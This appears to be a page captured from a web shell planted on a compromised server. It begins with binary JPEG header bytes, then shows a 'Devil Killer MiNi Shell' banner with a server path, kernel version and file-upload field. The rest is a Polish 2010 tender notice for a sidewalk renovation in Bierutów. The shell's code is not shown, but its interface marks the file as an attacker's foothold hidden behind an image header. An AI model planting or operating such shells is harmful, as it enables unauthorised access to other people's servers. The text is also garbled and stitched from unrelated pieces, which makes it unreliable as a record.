JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100823/260854-N-2010.html

<p class="kh_header"><b>Oleśnica: Wykonanie chodnika na ul. Żeromskiego w Bierutowie, droga
powiatowa nr 1460 D, odcinek 200 mb, gm. Bierutów</b><br>
<b>Numer ogłoszenia: 260854 - 2010; data zamieszczenia: 23.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Oleśnicy , ul. Wojska Polskiego 52c, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3981667, 3993244.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie chodnika na ul. Żeromskiego w Bierutowie, droga
powiatowa nr 1460 D, odcinek 200 mb, gm. Bierutów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Opis przedmiotu zamówienia:
Przedmiotem opracowania jest projekt remontu chodnika w km 0+000 - 0+236 w
miejscowości Bierutów, ul. Żeromskiego, w ciągu drogi powiatowej - dz. Nr 14.3.
Lokalizacja.
Remontowany chodnik przebiega od granicy z terenem PKP (za torami
kolejowymi) do ostatniego zjazdu na teren posesji, kończącej teren zabudowany - po
prawej stronie drogi asfaltowej.
Stan istniejący.
Remontowany chodnik przebiega równolegle do istniejącej drogi asfaltowej o
charakterze drogi powiatowej - w całości usytuowany jest w bezpośrednim sąsiedztwie
w/w drogi.
Obecnie nawierzchnia chodnika w znacznej części jest ziemna, częściowo
ulepszona.
Na teren posesji przyległych do drogi wykonane zostały zjazdy utwardzone.
Rozwiązania sytuacyjne.
Warunki sytuacyjne, tj. szerokość pasa drogowego w zasadniczej części pozwala
na regularne wpisanie chodnika w teren.
Przy istniejącym przepuście (km 0+0475) konieczne jest zamontowanie studni
rewizyjnej i zakrycie odcinka rowu na długości 18,0 m rurami PCV o przekroju O 600
wraz z wyrównaniem terenu do poziomu istniejącego ciągu pieszego.
Szerokość remontowanego ciągu pieszego wynosi 1,5 m.
Projektowana niweleta.
Projekt nie przewiduje korekty istniejącej niwelety chodnika, poza konstrukcyjnym
wyniesieniem ponad teren. Związane jest to z technologią, w jakiej przewiduje się
remont.
Rozwiązania konstrukcyjne.
Chodnik:
- kostka brukowa betonowa gr. 6 cm,
- podsypka piaskowa gr. 10 cm,
Zjazdy:
- kostka brukowa betonowa gr. 8 cm,
- podsypka cementowo-piaskowa 1:4 gr. 4 cm lub miał kamienny 0/5 mm gr. 3 cm,
- podbudowa z kruszywa łamanego 0/63 mm gr. 15 cm,
Opornik:
- krawężnik betonowy 15*30 cm na ławie betonowej z oporem wg KPED - karta
03.10,
- obrzeże betonowe 8*30 cm na podsypce piaskowej wg KPED - karta 03.15 lub
ławie betonowej B15,
Odwodnienie.
Odprowadzenie wód opadowych realizowane będzie bezpośrednio do
przyległego rowu otwartego. Zaprojektowano 4 wpusty uliczne boczne z żeliwa szarego i
betonu montowane w celu odprowadzenia wód opadowych z drogi asfaltowej.
Uzbrojenie podziemne.
W obrębie prowadzonych robót występują sieci: wodociągowa, kanalizacji
sanitarnej, energetyczna oraz telekomunikacyjna.
W miejscach zbliżenia się do sieci podziemnych roboty ziemne należy prowadzić
ręcznie. Zachować warunki i wymagania określone przez właścicieli sieci w
uzgodnieniach branżowych.
Wykonawstwo.
Wszystkie roboty wykonywać zgodnie z obowiązującymi normami, z materiałów
posiadających stosowne atesty jakościowe. Do wykonywania robót stosować
odpowiedni sprzęt.
W trakcie prowadzenia robót ich jakość powinna być sprawdzana zgodnie z
obowiązującymi wymaganiami i normami.
Organizacja oraz zabezpieczenie robót.
O terminie rozpoczęcia robót należy powiadomić właścicieli sieci uzbrojenia
podziemnego oraz służby geodezyjne, które powinny przekazać w dozór Wykonawcy -
na okres trwania robót - elementy uzbrojenia oraz stałe punkty osnowy geodezyjnej
(stałe punkty osnowy geodezyjnej oznaczono kolorem zielonym na kopiach map
sytuacyjno-wysokościowych).
W czasie trwania robót teren powinien zostać zabezpieczony i oznakowany
zgodnie z katalogiem oznakowania w uzgodnieniu z zarządcą drogi.
INFORMACJA DOTYCZĄCA BEZPIECZEŃSTWA I OCHRONY ZDROWIA
Zakres robót dla całego zamierzenia budowlanego oraz kolejność realizacji
poszczególnych obiektów:
Zakres robót obejmuje remont chodnika.
Roboty przy realizacji obiektu prowadzone będą w następującej kolejności:
- Roboty ziemne - zdjęcie humusu, wykonanie koryta, itp.
- Roboty drogowe - wykonanie podbudowy i warstw konstrukcyjnych,
- Wykonanie odwodnienia,
- Roboty zabezpieczające istniejącą infrastrukturę,
Wyniesienie i utrzymanie organizacji ruchu zastępczego i docelowego,
- Roboty porządkowe.
Wykaz istniejących obiektów budowlanych.
Nie występują.
Wykaz elementów zagospodarowania działki lub terenu, które mogą stworzyć
zagrożenie bezpieczeństwa i zdrowia ludzi.
Nie występują.
Wskazania dotyczące przewidywanych zagrożeń występujących podczas realizacji
robót budowlanych, określając skalę i rodzaj zagrożeń oraz miejsce i czas ich
występowania.
1. Załoga zatrudniona na budowie powinna zostać przeszkolona w zakresie przepisów
bhp oraz powinna posiadać aktualne badania lekarskie. Przed przystąpieniem do
wykonywania robót, kierownik budowy powinien przeprowadzić szkolenie bhp
stanowiskowe. Zatrudnieni pracownicy powinni być zaopatrzeni w odzież roboczą,
odzież ochronną oraz w osobiste środki ochrony bhp.
2. BHP przy robotach ziemnych:
Rodzaje zagrożeń:
- porażenie prądem elektrycznym w przypadku kolizji z linią elektryczną
3. BHP przy robotach drogowych:
Rodzaje zagrożeń:
- porażenie prądem elektrycznym (należy stosować uziom maszyn)
- niebezpieczeństwo wynikające z ruchomych części działających maszyn i urządzeń
(należy stosować osłony zabezpieczające)
- nieprawidłowe cięcie kostki betonowej,
- skaleczenie stosowanymi narzędziami
- uderzenie lub otarcie materiałami ściernymi
- uszkodzenie oczu zaprawą, klejem, pyłem
Wskazanie sposobu prowadzenia instruktażu pracowników przed przystąpieniem do
realizacji robót szczególnie niebezpiecznych.
Nie wymagane.
Wskazanie środków technicznych i organizacyjnych, zapobiegających
niebezpieczeństwu wynikającemu z wykonywanych robót budowlanych w strefach
szczególnego zagrożenia zdrowia lub w ich sąsiedztwie, w tym zapewniających
bezpieczną i sprawną komunikację, umożliwiającą ewakuację na wypadek pożaru,
awarii i innych zagrożeń:
Nie wymagane.
- szczegółowy opis przedmiotu zamówienia zawiera - załącznik do SIWZ ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 3 000,00 zł,
słownie: trzy tysiące złotych 00-100.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że w okresie ostatnich 5 lat licząc od dnia złożenia oferty, a
jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował co
najmniej 1 zadanie o podobnym charakterze (w zakresie budowy i - lub przebudowy i -
lub remontu chodników), przy czym wartość zrealizowanego zamówienia powinna być
nie mniejsza niż 70% zaoferowanej ceny ofertowej brutto.
Wykonawca winien wykazać, że te roboty zostały wykonane zgodnie z zasadami sztuki
budowlanej i prawidłowo ukończone (np: referencje).
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie
przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia - nie
spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje osobami zdolnymi do wykonania
zamówienia, posiadającymi kwalifikacje niezbędne do wykonania zamówienia - co
najmniej 1 osoba na stanowisku Kierownika Budowy, posiadająca wykształcenie
techniczne i uprawnienia budowlane do kierowania robotami budowlanymi w
specjalności drogowej bez ograniczeń lub odpowiadające im uprawnienia budowlane
wydane na podstawie wcześniej obowiązujących przepisów oraz będący członkiem
właściwej terytorialnie Izby Inżynierów Budownictwa.
Sprawdzenie ww. warunku udziału w postępowaniu odbywać się będzie na podstawie
przedłożonych przez Wykonawcę dokumentów i oświadczeń wg zasady spełnia - nie
spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A. Na ofertę składają się następujące dokumenty i załączniki :
A.1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę - zał. do SIWZ,
A.2) Dowód wniesienia wadium,
A.3) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1
Prawa zamówień publicznych - zał. do SIWZ,
A.4) Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie
zamówienia z art. 24 ust. 1 Prawa zamówień publicznych - zał. do SIWZ.
B. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie
zamówienia z art. 24 ust 1 Prawa zamówień publicznych Wykonawca składa
następujące dokumenty:
B.1) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu
do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1
pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu
składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1
pkt. 2 Ustawy PZP - wzór oświadczenia dot. osób fizycznych z którego Wykonawca
może skorzystać stanowi załącznik do niniejszej SIWZ,
B.2) Dokumenty potwierdzające posiadanie uprawnień pełnomocnictw osób
składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych
dokumentów rejestrowych.
C . W celu wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22
ust. 1 pkt. 1) do 3) ustawy PZP, należy złożyć następujące dokumenty:
C.1) Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania
warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat licząc od
dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem
dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki
budowlanej i prawidłowo ukończone (np. referencje), tj. 1 zadanie o podobnym
charakterze (w zakresie budowy i, lub przebudowy i, lub remontu chodników), przy
czym wartość zrealizowanego zamówienia powinna być nie mniejsza niż 70%
zaoferowanej ceny ofertowej brutto - zał. do SIWZ,
C.2) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, niezależnie od
tego, czy są one zatrudnione bezpośrednio przez Wykonawcę, w szczególności
odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami
budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia
i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu
wykonywanych przez nie czynności, tj.: co najmniej 1 osoba na stanowisku Kierownika
Budowy, posiadająca wykształcenie techniczne i uprawnienia budowlane do kierowania
robotami budowlanymi w specjalności drogowej bez ograniczeń lub odpowiadające im
uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów
oraz będący członkiem właściwej terytorialnie Izby Inżynierów Budownictwa - zał. do
SIWZ,
C.3) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia,
posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich
uprawnień - zał. do SIWZ.
D . Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej :
D.1) Zamiast dokumentów, o których mowa w pkt. B.1), składa dokument lub dokumenty, wystawione w
kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed
upływem terminu składania ofert,
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6
miesięcy przed upływem terminu składania ofert.
D.2) Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce
zamieszkania, nie wydaje się dokumentów wskazanych w niniejszym pkt. D zastępuje się je dokumentem
zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym
albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub
kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawionych nie wcześniej niż w
terminach określonych w niniejszym pkt. D.
E . Dokumenty wymagane w przypadku składania oferty wspólnej :
E.1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla
ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w
postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.
E.2) Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt. A.3), A.4), B.1), B.2) dla każdego
partnera z osobna, pozostałe dokumenty składane są wspólnie.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum, spółka cywilna) muszą
ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie przedmiotowego zamówienia
lub do reprezentowania ich w niniejszym postępowaniu oraz zawarcia umowy w sprawie niniejszego
zamówienia. Pełnomocnictwo, z którego powinien wynikać zakres umocowania dla pełnomocnika
ustanowionego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy dołączyć do
oferty.
- Jeżeli pełnomocnik w imieniu mocodawców podpisuje także oświadczenie wiedzy o spełnieniu przez
Wykonawcę warunków udziału w postępowaniu, w tym określone w art. 22 ust. 1 Ustawy PZP oraz
oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego z
powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 Ustawy PZP, udzielone pełnomocnictwo
ma zawierać wyraźnie wyartykułowane umocowanie do złożenia oświadczeń w tym zakresie.
F. Postanowienia dotyczące składanych dokumentów :
F.1) Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa w pkt. C, D polega na zasobach
innych podmiotów zobowiązany jest wykazać, że w stosunku do tych podmiotów brak jest podstaw
wykluczenia z postępowania o udzielenie zamówienia poprzez złożenie razem z ofertą dokumentów
wymienionych w pkt. od B.1) do B.2) dotyczących każdego z tych podmiotów, o ile podmioty te będą brały
udział w realizacji części zamówienia.
F.2) Dokumenty w niniejszym postępowaniu mogą być składane w oryginale lub kopii poświadczonej za
zgodność z oryginałem przez Wykonawcę lub osobę, osoby uprawnione do podpisania oferty z dopiskiem
za zgodność z oryginałem.
F.3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku
podmiotów, o których mowa w pkt. F.1), kopie dokumentów dotyczących każdego z tych podmiotów winny
być poświadczane za zgodność z oryginałem przez te podmioty.
F.4) Oferta, składane dokumenty oraz oświadczenia podpisane przez upoważnionego przedstawiciela
Wykonawcy wymagają załączenia właściwego pełnomocnictwa lub umocowania prawnego.
F.5) Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski,
poświadczonym przez Wykonawcę.
F.6) Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu
wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co
do jej prawdziwości.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Projekt umowy stanowi załącznik do niniejszej specyfikacji istotnych warunków
zamówienia.
2. Zamawiający przewiduje wprowadzenie zmian postanowień zawartej umowy w
stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w
przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z
uwzględnieniem podawanych warunków ich wprowadzenia.
2.1. Zmiana terminu realizacji przedmiotu umowy:
a. zmiany spowodowane warunkami atmosferycznymi, geologicznymi,
archeologicznymi, w szczególności:
a.1) klęski żywiołowe,
a.2) niewypały, niewybuchy,
a.3) wykopaliska archeologiczne,
a.4) odmienne od przyjętych w dokumentacji warunki geologiczne
(kategorie gruntu, kurzawka, itp.).
b. zmiany będące następstwem działania organów administracji, w
szczególności:
b.1) przekroczenie zakreślonych przez prawo terminów wydawania przez
organy adm. decyzji, zezwoleń, uzgodnień, itp.,
b.2) odmowa wydania przez organy adm. wymaganych decyzji, zezwoleń.
2.2 Zmiana sposobu spełniania świadczenia - zmiany technologiczne a w
szczególności:
a) pojawienie się na rynku materiałów lub urządzeń nowszej generacji
pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub
kosztów eksploatacji wykonanego przedmiotu umowy,
b) pojawienie się nowszej technologi wykonania zaprojektowanych robót
pozwalającej na zaoszczędzeniu czasu realizacji inwestycji lub kosztów
wykonanych prac, jak również kosztów eksploatacji wykonanego przedmiotu
umowy,
c) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań
technicznych / technologicznych lub materiałów niż wskazane w
dokumentacji, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań
groziło niewykonaniem lub wadliwym wykonaniem robót,
d) konieczność zrealizowania robót przy zastosowaniu innych rozwiązań
technicznych lub materiałowych ze względu na zmiany obowiązującego
prawa.
2.3 Pozostałe zmiany:
a) zmiany stawki podatku VAT wynikającej z odrębnych przepisów,
b) zamian sposobu rozliczania umowy lub dokonywania płatności na rzecz
Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o
dofinansowanie projektu lub wytycznych dotyczących realizacji projektu,
c) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy -
w takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie
pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione
świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w
związku z wynikającymi z umowy planowanymi świadczeniami,
d) wystąpienie robót zamiennych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
